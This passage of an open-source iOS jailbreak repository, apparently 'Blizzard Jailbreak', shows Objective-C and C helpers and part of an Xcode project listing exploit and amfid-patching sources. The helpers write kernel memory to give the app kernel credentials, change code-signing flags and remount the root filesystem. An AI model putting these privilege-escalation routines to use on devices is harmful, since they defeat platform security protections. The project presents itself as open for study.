copyPIDCredentials(pid_t processToBeGivenCreds, pid_t donorProcess){\n    printf(\"CredentialsCopier: Giving process %d process %d's credentials...\\n\", processToBeGivenCreds, donorProcess);\n    uint64_t procFromPID = proc_of_pid(processToBeGivenCreds);\n    uint64_t donorproc = proc_of_pid(donorProcess);\n    uint64_t processCredentials = rk64(procFromPID + off_p_ucred);\n    uint64_t donorcred = rk64(donorproc + off_p_ucred);\n    \n    if (procFromPID != 0 || donorcred != 0){\n        wk64(procFromPID + off_p_ucred, donorcred);\n        printf(\"CredentialsCopier: Successfully granted credentials from process!\\n\");\n        return processCredentials;\n    } else {\n        printf(\"CredentialsCopier: Failed to copy credentials from process!\\n\");\n        return -1;\n    }\n}\n\nint remountFileSystem(){\n    int returnValue = remountRootFS();\n\n   
 if (returnValue == 0) {\n        printf(\"ROOT FS REMOUNT: Successfully remounted!\\n\");\n        return 0;\n    } else {\n        printf(\"ROOT FS REMOUNT: Failed to Remount!\\n\");\n        return -1;\n    }\n}\n\nint setcsflags(pid_t pid) {\n    if (!pid) return NO;\n    uint64_t proc = proc_of_pid(pid);\n    uint32_t csflags = rk32(proc + off_p_csflags);\n    uint32_t newflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL);\n    wk32(proc + off_p_csflags, newflags);\n    \n    if (rk32(proc + off_p_csflags) == newflags){\n        printf(\"Successfully set CodeSign Flags!\\n\");\n        return 0;\n    } else {\n        printf(\"Failed to set CodeSign Flags!\\n\");\n        return -1;\n    }\n}\n\nint spawnBinaryAtPath(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env) {\n    pid_t pd;\n    const char* args[] = {binary, arg1, arg2, arg3, arg4, arg5, arg6,  NULL};\n    int rv = posix_spawn(&pd, binary, NULL, NULL, (char **)&args, env);\n    if (rv) return rv;\n    return 0;\n}\n\nint prepareKernelForPatchFinder(){\n    NSString *kernelNewLocation;\n    NSError *error;\n    NSFileManager *fileManager = [NSFileManager defaultManager];\n    NSDateFormatter *dateTimeFormat = [[NSDateFormatter alloc] init];\n    [dateTimeFormat setDateFormat:@\"dd.MM.YY:HH.mm.ss\"];\n    \n    NSString *PathToDocuments = [[[fileManager URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject] path];\n    mkdir(strdup([PathToDocuments UTF8String]), 0777);\n    kernelNewLocation = [PathToDocuments stringByAppendingPathComponent:[NSString stringWithFormat:@\"%@_kernelcache\", [dateTimeFormat stringFromDate:[NSDate date]]]];\n    printf(\"Kernel Decompression: Copying Kernel to %s\\n\", [kernelNewLocation UTF8String]);\n    \n    [fileManager copyItemAtPath:@\"/System/Library/Caches/com.apple.kernelcaches/kernelcache\" toPath:kernelNewLocation 
error:&error];\n    if (error) {\n        printf(\"Kernel Decompression: Failed to copy the kernelcache with the following error: %s\\n\", [[error localizedDescription] UTF8String]);\n        return 4;\n    }\n    \n    if (decompressKernelCache(strdup([kernelNewLocation UTF8String]))) {\n        printf(\"Kernel Decompression: Error initializing KernelSymbolFinder\\n\");\n        return 4;\n    }\n    initializePatchFinderWithBase(0, (char *)[[kernelNewLocation stringByAppendingString:@\".dec\"] UTF8String]);\n    return 0;\n}\n\nint installBootStrap(){\n    int retval;\n    printf(\"Blizzard BOOTSTRAP: Preparing to Bootstrap!\\n\");\n    printf(\"Blizzard BOOTSTRAP: Creating a pre-jailbreak Snapshot! This will be useful in case we wanna un-jailbreak.\\n\");\n    int checkSnap = verifySnapshot(\"/\", \"Calm-Before-The-Storm\");\n    \n    if (checkSnap != APFS_SNAPSHOT_EXISTS){\n        printf(\"Blizzard BOOTSTRAP: Temporarily setting kernel credentials\\n\");\n        uint64_t creds = copyPIDCredentials(getpid(), 0);\n        if (createNewAPFSSnapshot(\"/\", \"Calm-Before-The-Storm\") == 0){\n            list_snapshots(\"/\");\n            printf(\"Blizzard BOOTSTRAP: Successfully created the stock snapshot!\\n\");\n            retval = 0;\n        } else {\n            printf(\"Blizzard BOOTSTRAP: FAILED to create the stock snapshot!\\n\");\n            retval = -1;\n        }\n        uint64_t proc_smp = proc_of_pid(getpid());\n        wk64(proc_smp + off_p_ucred, creds);\n        return retval;\n    } else {\n        printf(\"Blizzard BOOTSTRAP: Safety Snapshot already exists! Will not make another one :-)\\n\");\n        return 0;\n    }\n}\n"
  },
  {
    "path": "Blizzard Jailbreak/blizzardView.h",
    "content": "//\n//  blizzardView.h\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 8/10/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#import <UIKit/UIKit.h>\n\nNS_ASSUME_NONNULL_BEGIN\nUIBarButtonItem* dismissKeyboardButton;\n@interface blizzardView : UIViewController\n@property (weak, nonatomic) IBOutlet UIButton *blizzardInit;\n@property (weak, nonatomic) IBOutlet UITextField *nonceField;\n\n@end\n\nNS_ASSUME_NONNULL_END\n"
  },
  {
    "path": "Blizzard Jailbreak/blizzardView.m",
    "content": "//\n//  blizzardView.m\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 8/10/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#import \"blizzardView.h\"\n#include \"blizzardJailbreak.h\"\n#define iosVersionSupport(v)  ([[[UIDevice currentDevice] systemVersion] compare:@v options:NSNumericSearch] != NSOrderedDescending)\n\n@interface blizzardView () <UITextFieldDelegate>\n\n@end\n\n@implementation blizzardView\n\n- (void)viewDidLoad {\n    [super viewDidLoad];\n    self.nonceField.delegate = self;\n    printf(\"Blizzard Jailbreak\\nby GeoSn0w (@FCE365)\\n\\nAn Open-Source Jailbreak for you to study and dissect :-)\\n\");\n}\n- (IBAction)blizzardInit:(id)sender {\n    if (iosVersionSupport(\"13.7\")){\n        _blizzardInit.enabled = NO;\n        [_blizzardInit setTitle:@\"JAILBREAKING...\" forState:UIControlStateDisabled];\n        dispatch_async(dispatch_get_global_queue(0, 0), ^{\n            dispatch_async(dispatch_get_main_queue(), ^{\n                 [self performSegueWithIdentifier:@\"vc\" sender:self];\n        });\n    });\n    } else if (iosVersionSupport(\"14.0\")){\n        printf(\"The iOS version is not supported\");\n        exit(0);\n    }\n    \n    \n}\n- (IBAction)injectSettingsUI:(id)sender {\n    [self performSegueWithIdentifier:@\"settingsView\" sender:self];\n}\n- (IBAction)saveJailbreakSettings:(id)sender {\n    [self dismissViewControllerAnimated:YES completion:nil];\n}\n- (BOOL)textFieldShouldReturn:(UITextField *)textField {\n    [textField resignFirstResponder];\n    return YES;\n}\n@end\n"
  },
  {
    "path": "Blizzard Jailbreak/main.m",
    "content": "//\n//  main.m\n//  sock_port\n//\n//  Created by Jake James on 7/17/19.\n//  Copyright © 2019 Jake James. All rights reserved.\n//\n\n#import <UIKit/UIKit.h>\n#import \"AppDelegate.h\"\n\nint main(int argc, char * argv[]) {\n    @autoreleasepool {\n        return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));\n    }\n}\n"
  },
  {
    "path": "Blizzard Jailbreak.xcodeproj/project.pbxproj",
    "content": "// !$*UTF8*$!\n{\n\tarchiveVersion = 1;\n\tclasses = {\n\t};\n\tobjectVersion = 48;\n\tobjects = {\n\n/* Begin PBXBuildFile section */\n\t\t8288501222E07303005D10FC /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 8288501022E07303005D10FC /* kernel_memory.c */; };\n\t\t8288501522E07C15005D10FC /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 8288501322E07C14005D10FC /* offsets.m */; };\n\t\t82E9B71522E24BAD0016AA39 /* iosurface.c in Sources */ = {isa = PBXBuildFile; fileRef = 82E9B71422E24BAD0016AA39 /* iosurface.c */; };\n\t\t82F179F122DF4ED700231F8C /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F179F022DF4ED700231F8C /* AppDelegate.m */; };\n\t\t82F179F722DF4ED700231F8C /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 82F179F522DF4ED700231F8C /* Main.storyboard */; };\n\t\t82F179F922DF4ED700231F8C /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 82F179F822DF4ED700231F8C /* Assets.xcassets */; };\n\t\t82F179FC22DF4ED700231F8C /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */; };\n\t\t82F179FF22DF4ED700231F8C /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F179FE22DF4ED700231F8C /* main.m */; };\n\t\t82F17A0922DF4ED800231F8C /* socket_freeTests.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A0822DF4ED800231F8C /* socket_freeTests.m */; };\n\t\t82F17A1422DF4ED800231F8C /* socket_freeUITests.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A1322DF4ED800231F8C /* socket_freeUITests.m */; };\n\t\t82F17A2322DF4EF100231F8C /* exploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A2122DF4EF100231F8C /* exploit.c */; };\n\t\t82F17A2622DF4F1C00231F8C /* exploit_utilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A2422DF4F1C00231F8C /* exploit_utilities.c */; };\n\t\tD613B71B24E217D90069CA9B /* BlizzardLog.m in Sources */ = {isa = PBXBuildFile; fileRef 
= D613B71A24E217D90069CA9B /* BlizzardLog.m */; };\n\t\tD613B72724E2A76A0069CA9B /* rootfs_remount.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B72424E2A76A0069CA9B /* rootfs_remount.m */; };\n\t\tD613B72824E2A76A0069CA9B /* offsetfinder.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D613B72624E2A76A0069CA9B /* offsetfinder.cpp */; };\n\t\tD613B73524E2A8AB0069CA9B /* snapshot_tools.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B73424E2A8AB0069CA9B /* snapshot_tools.c */; };\n\t\tD613B74524E2B1C20069CA9B /* liboffsetfinder64.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73B24E2B1530069CA9B /* liboffsetfinder64.a */; };\n\t\tD613B74624E2B1E70069CA9B /* libimg4tool.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73F24E2B1540069CA9B /* libimg4tool.a */; };\n\t\tD613B74724E2B1E70069CA9B /* libmerged.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73E24E2B1530069CA9B /* libmerged.a */; };\n\t\tD613B74824E2B1E70069CA9B /* libplist.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73C24E2B1530069CA9B /* libplist.a */; };\n\t\tD613B74924E2B1E70069CA9B /* libplist++.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73D24E2B1530069CA9B /* libplist++.a */; };\n\t\tD613B74B24E2B2560069CA9B /* libcompression.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B74A24E2B2560069CA9B /* libcompression.tbd */; };\n\t\tD613B74D24E2B2600069CA9B /* libMobileGestalt.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */; };\n\t\tD613B75024E2CD5E0069CA9B /* BlizzardSpawnerTools.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */; };\n\t\tD613B75724E2E8300069CA9B /* amfi_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75324E2E8300069CA9B /* amfi_utils.m */; };\n\t\tD613B75824E2E8300069CA9B /* amfid_tools.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75424E2E8300069CA9B /* amfid_tools.m */; 
};\n\t\tD613B75924E2E8300069CA9B /* amfid_mem.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75624E2E8300069CA9B /* amfid_mem.m */; };\n\t\tD613B75C24E2E8590069CA9B /* amfid.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75B24E2E8580069CA9B /* amfid.m */; };\n\t\tD613B76024E2EEFD0069CA9B /* osobject.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B75E24E2EEFD0069CA9B /* osobject.c */; };\n\t\tD613B76624E2F2D30069CA9B /* kernSymbolication.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B76424E2F2D30069CA9B /* kernSymbolication.c */; };\n\t\tD613B78224E2F9980069CA9B /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D613B78024E2F9980069CA9B /* lzssdec.cpp */; };\n\t\tD62BC51E24E4113200EC63D4 /* tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC51D24E4113200EC63D4 /* tar */; };\n\t\tD62BC52024E41AF500EC63D4 /* basebins.tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC51F24E41AF500EC63D4 /* basebins.tar */; };\n\t\tD62BC52224E41F2500EC63D4 /* dropbear.tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC52124E41F2500EC63D4 /* dropbear.tar */; };\n\t\tD62CA1E524E1C7EA002E6756 /* patchfinder64.m in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1E424E1C7EA002E6756 /* patchfinder64.m */; };\n\t\tD62CA1E824E1C7F7002E6756 /* kexecute.c in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1E624E1C7F7002E6756 /* kexecute.c */; };\n\t\tD62CA1EB24E1C7FF002E6756 /* kernel_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1EA24E1C7FF002E6756 /* kernel_utils.m */; };\n\t\tD62CA1EE24E1C83F002E6756 /* offsetof.c in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1EC24E1C83E002E6756 /* offsetof.c */; };\n\t\tD63EDAC124E1989F009B305D /* blizzardJailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = D63EDABF24E1989F009B305D /* blizzardJailbreak.m */; };\n\t\tD69C4C9925686628001DE2BC /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D69C4C9825686627001DE2BC /* IOKit.tbd */; 
};\n\t\tD69C4CAE25686895001DE2BC /* ios13_userspace_pac.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA425686894001DE2BC /* ios13_userspace_pac.c */; };\n\t\tD69C4CAF25686895001DE2BC /* ios13_kernel_universal.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA525686894001DE2BC /* ios13_kernel_universal.c */; };\n\t\tD69C4CB025686895001DE2BC /* ios13_userspace.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA625686894001DE2BC /* ios13_userspace.c */; };\n\t\tD69C4CB125686895001DE2BC /* ios13_change_offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA725686894001DE2BC /* ios13_change_offsets.m */; };\n\t\tD69C4CB225686895001DE2BC /* libsnappy.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CAA25686895001DE2BC /* libsnappy.c */; };\n\t\tD69C4CB325686895001DE2BC /* ios_7st_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CAB25686895001DE2BC /* ios_7st_utils.m */; };\n\t\tD6FFA56224E1A59A00CAC2E2 /* blizzardView.m in Sources */ = {isa = PBXBuildFile; fileRef = D6FFA56124E1A59A00CAC2E2 /* blizzardView.m */; };\n/* End PBXBuildFile section */\n\n/* Begin PBXContainerItemProxy section */\n\t\t82F17A0522DF4ED800231F8C /* PBXContainerItemProxy */ = {\n\t\t\tisa = PBXContainerItemProxy;\n\t\t\tcontainerPortal = 82F179E422DF4ED700231F8C /* Project object */;\n\t\t\tproxyType = 1;\n\t\t\tremoteGlobalIDString = 82F179EB22DF4ED700231F8C;\n\t\t\tremoteInfo = socket_free;\n\t\t};\n\t\t82F17A1022DF4ED800231F8C /* PBXContainerItemProxy */ = {\n\t\t\tisa = PBXContainerItemProxy;\n\t\t\tcontainerPortal = 82F179E422DF4ED700231F8C /* Project object */;\n\t\t\tproxyType = 1;\n\t\t\tremoteGlobalIDString = 82F179EB22DF4ED700231F8C;\n\t\t\tremoteInfo = socket_free;\n\t\t};\n/* End PBXContainerItemProxy section */\n\n/* Begin PBXFileReference section */\n\t\t8288501022E07303005D10FC /* kernel_memory.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kernel_memory.c; sourceTree = \"<group>\"; 
};\n\t\t8288501122E07303005D10FC /* kernel_memory.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kernel_memory.h; sourceTree = \"<group>\"; };\n\t\t8288501322E07C14005D10FC /* offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = \"<group>\"; };\n\t\t8288501422E07C14005D10FC /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = \"<group>\"; };\n\t\t82E9B71322E24BAC0016AA39 /* iosurface.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = iosurface.h; sourceTree = \"<group>\"; };\n\t\t82E9B71422E24BAD0016AA39 /* iosurface.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = iosurface.c; sourceTree = \"<group>\"; };\n\t\t82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = \"Blizzard Jailbreak.app\"; sourceTree = BUILT_PRODUCTS_DIR; };\n\t\t82F179EF22DF4ED700231F8C /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = \"<group>\"; };\n\t\t82F179F022DF4ED700231F8C /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = \"<group>\"; };\n\t\t82F179F622DF4ED700231F8C /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = \"<group>\"; };\n\t\t82F179F822DF4ED700231F8C /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = \"<group>\"; };\n\t\t82F179FB22DF4ED700231F8C /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = \"<group>\"; 
};\n\t\t82F179FD22DF4ED700231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = \"<group>\"; };\n\t\t82F179FE22DF4ED700231F8C /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = \"<group>\"; };\n\t\t82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = \"Blizzard JailbreakTests.xctest\"; sourceTree = BUILT_PRODUCTS_DIR; };\n\t\t82F17A0822DF4ED800231F8C /* socket_freeTests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = socket_freeTests.m; sourceTree = \"<group>\"; };\n\t\t82F17A0A22DF4ED800231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = \"<group>\"; };\n\t\t82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = \"Blizzard JailbreakUITests.xctest\"; sourceTree = BUILT_PRODUCTS_DIR; };\n\t\t82F17A1322DF4ED800231F8C /* socket_freeUITests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = socket_freeUITests.m; sourceTree = \"<group>\"; };\n\t\t82F17A1522DF4ED800231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = \"<group>\"; };\n\t\t82F17A2122DF4EF100231F8C /* exploit.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = exploit.c; sourceTree = \"<group>\"; };\n\t\t82F17A2222DF4EF100231F8C /* exploit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = exploit.h; sourceTree = \"<group>\"; };\n\t\t82F17A2422DF4F1C00231F8C /* exploit_utilities.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = exploit_utilities.c; sourceTree = \"<group>\"; };\n\t\t82F17A2522DF4F1C00231F8C /* exploit_utilities.h */ = 
{isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = exploit_utilities.h; sourceTree = \"<group>\"; };\n\t\t82F17A2822DF57B700231F8C /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = IOKit.tbd; path = socket_free/IOKit.tbd; sourceTree = \"<group>\"; };\n\t\tD613B71924E217D90069CA9B /* BlizzardLog.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BlizzardLog.h; sourceTree = \"<group>\"; };\n\t\tD613B71A24E217D90069CA9B /* BlizzardLog.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = BlizzardLog.m; sourceTree = \"<group>\"; };\n\t\tD613B72424E2A76A0069CA9B /* rootfs_remount.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = rootfs_remount.m; sourceTree = \"<group>\"; };\n\t\tD613B72524E2A76A0069CA9B /* rootfs_remount.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = rootfs_remount.h; sourceTree = \"<group>\"; };\n\t\tD613B72624E2A76A0069CA9B /* offsetfinder.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = offsetfinder.cpp; sourceTree = \"<group>\"; };\n\t\tD613B72924E2A79F0069CA9B /* liboffsetfinder64.hpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.h; path = liboffsetfinder64.hpp; sourceTree = \"<group>\"; };\n\t\tD613B72A24E2A7B70069CA9B /* liboffsetfinder64.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = liboffsetfinder64.a; path = \"../electra1131-master/electra1131/libs/liboffsetfinder64.a\"; sourceTree = \"<group>\"; };\n\t\tD613B72B24E2A7B70069CA9B /* libplist.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libplist.a; path = \"../electra1131-master/electra1131/libs/libplist.a\"; sourceTree = \"<group>\"; };\n\t\tD613B72C24E2A7B70069CA9B /* libplist++.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = 
\"libplist++.a\"; path = \"../electra1131-master/electra1131/libs/libplist++.a\"; sourceTree = \"<group>\"; };\n\t\tD613B72D24E2A7B70069CA9B /* libmerged.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libmerged.a; path = \"../electra1131-master/electra1131/libs/libmerged.a\"; sourceTree = \"<group>\"; };\n\t\tD613B72E24E2A7B70069CA9B /* libimg4tool.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libimg4tool.a; path = \"../electra1131-master/electra1131/libs/libimg4tool.a\"; sourceTree = \"<group>\"; };\n\t\tD613B73424E2A8AB0069CA9B /* snapshot_tools.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = snapshot_tools.c; sourceTree = \"<group>\"; };\n\t\tD613B73624E2A8B00069CA9B /* snapshot_tools.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = snapshot_tools.h; sourceTree = \"<group>\"; };\n\t\tD613B73724E2A8C40069CA9B /* IOKit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOKit.h; sourceTree = \"<group>\"; };\n\t\tD613B73824E2A99B0069CA9B /* system_reboot.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = system_reboot.h; sourceTree = \"<group>\"; };\n\t\tD613B73B24E2B1530069CA9B /* liboffsetfinder64.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = liboffsetfinder64.a; sourceTree = \"<group>\"; };\n\t\tD613B73C24E2B1530069CA9B /* libplist.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libplist.a; sourceTree = \"<group>\"; };\n\t\tD613B73D24E2B1530069CA9B /* libplist++.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = \"libplist++.a\"; sourceTree = \"<group>\"; };\n\t\tD613B73E24E2B1530069CA9B /* libmerged.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libmerged.a; sourceTree = \"<group>\"; };\n\t\tD613B73F24E2B1540069CA9B /* libimg4tool.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = 
libimg4tool.a; sourceTree = \"<group>\"; };\n\t\tD613B74A24E2B2560069CA9B /* libcompression.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = libcompression.tbd; path = usr/lib/libcompression.tbd; sourceTree = SDKROOT; };\n\t\tD613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = libMobileGestalt.tbd; path = usr/lib/libMobileGestalt.tbd; sourceTree = SDKROOT; };\n\t\tD613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = BlizzardSpawnerTools.c; sourceTree = \"<group>\"; };\n\t\tD613B74F24E2CD5E0069CA9B /* BlizzardSpawnerTools.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BlizzardSpawnerTools.h; sourceTree = \"<group>\"; };\n\t\tD613B75124E2E82F0069CA9B /* amfid_tools.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid_tools.h; sourceTree = \"<group>\"; };\n\t\tD613B75224E2E8300069CA9B /* amfi_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfi_utils.h; sourceTree = \"<group>\"; };\n\t\tD613B75324E2E8300069CA9B /* amfi_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfi_utils.m; sourceTree = \"<group>\"; };\n\t\tD613B75424E2E8300069CA9B /* amfid_tools.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid_tools.m; sourceTree = \"<group>\"; };\n\t\tD613B75524E2E8300069CA9B /* amfid_mem.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid_mem.h; sourceTree = \"<group>\"; };\n\t\tD613B75624E2E8300069CA9B /* amfid_mem.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid_mem.m; sourceTree = \"<group>\"; };\n\t\tD613B75A24E2E8580069CA9B 
/* amfid.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid.h; sourceTree = \"<group>\"; };\n\t\tD613B75B24E2E8580069CA9B /* amfid.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid.m; sourceTree = \"<group>\"; };\n\t\tD613B75D24E2E8690069CA9B /* cs_blob.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = cs_blob.h; sourceTree = \"<group>\"; };\n\t\tD613B75E24E2EEFD0069CA9B /* osobject.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = osobject.c; sourceTree = \"<group>\"; };\n\t\tD613B75F24E2EEFD0069CA9B /* osobject.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = osobject.h; sourceTree = \"<group>\"; };\n\t\tD613B76424E2F2D30069CA9B /* kernSymbolication.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kernSymbolication.c; sourceTree = \"<group>\"; };\n\t\tD613B76524E2F2D30069CA9B /* kernSymbolication.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kernSymbolication.h; sourceTree = \"<group>\"; };\n\t\tD613B78024E2F9980069CA9B /* lzssdec.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; path = lzssdec.cpp; sourceTree = \"<group>\"; };\n\t\tD613B78124E2F9980069CA9B /* lzssdec.hpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.h; path = lzssdec.hpp; sourceTree = \"<group>\"; };\n\t\tD62BC51D24E4113200EC63D4 /* tar */ = {isa = PBXFileReference; lastKnownFileType = \"compiled.mach-o.executable\"; path = tar; sourceTree = \"<group>\"; };\n\t\tD62BC51F24E41AF500EC63D4 /* basebins.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = basebins.tar; sourceTree = \"<group>\"; };\n\t\tD62BC52124E41F2500EC63D4 /* dropbear.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = dropbear.tar; sourceTree = \"<group>\"; 
